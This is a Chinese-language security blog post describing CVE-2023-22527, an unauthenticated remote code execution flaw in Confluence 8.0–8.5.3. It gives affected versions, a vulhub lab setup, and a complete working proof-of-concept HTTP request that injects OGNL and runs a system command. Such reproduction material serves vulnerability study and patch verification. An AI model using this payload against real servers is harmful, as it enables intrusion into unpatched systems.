CVE-2023-22527：Confluence远程代码执行漏洞

Timeline Sec

发布于 2024-04-11 20:05:04

1130

发布于 2024-04-11 20:05:04

文章被收录于专栏：Timeline SecTimeline Sec

0x01 简介

Atlassian Confluence是一个专业的企业知识管理与协同软件，也可以用于构建企业wiki。使用简单，它强大的编辑和站点管理特征能够帮助团队成员之间共享信息、文档协作、集体讨论，信息推送。

0x02 漏洞概述

漏洞编号：

在Confluence 8.0到8.5.3版本之间，存在一处由于任意velocity模板被调用导致的OGNL表达式注入漏洞，未授权攻击者利用该漏洞可以直接攻击Confluence服务器并执行任意命令。

0x03 影响版本

8.0.x

8.1.x

8.2.x

8.3.x

8.4.x

8.5.0-8.5.3

安全版本：

Confluence Data Center and Server >= 8.5.4 (LTS)

Confluence Data Center >= 8.6.0 (Data Center Only)

Confluence Data Center >= 8.7.1 (Data Center Only)

0x04 环境搭建

直接使用vulhub起docker，找到vulhub/confluence/CVE-2023-22527,

docker-compose up -d

访问http://127.0.0.1:8090即可进入安装向导

去Atlassian官方申请一个Confluence Server的测试证书

https://www.atlassian.com/zh/try

申请试用版许可证。

生成licenses

获取对应license

搭建环境

在填写数据库信息的页面，PostgreSQL数据库地址为db，数据库名称confluence，用户名密码均为postgres

默认均为第一个选项

取名test

搭建完成

0x05 漏洞复现

回到攻击机，访问对应地址

poc如下

POST /template/aui/text-inline.vm HTTP/1.1 
Host: 192.168.217.130:8090 
Cache-Control: max-age=0 
Upgrade-Insecure-Requests: 1 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 
Accept-Encoding: gzip, deflate 
Accept-Language: zh-CN,zh;q=0.9,th;q=0.8 
Cookie: JSESSIONID=001B30B8B02829BA586B87391DB9510E 
Connection: close 
Content-Type: application/x-www-form-urlencoded 
Content-Length: 285 

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))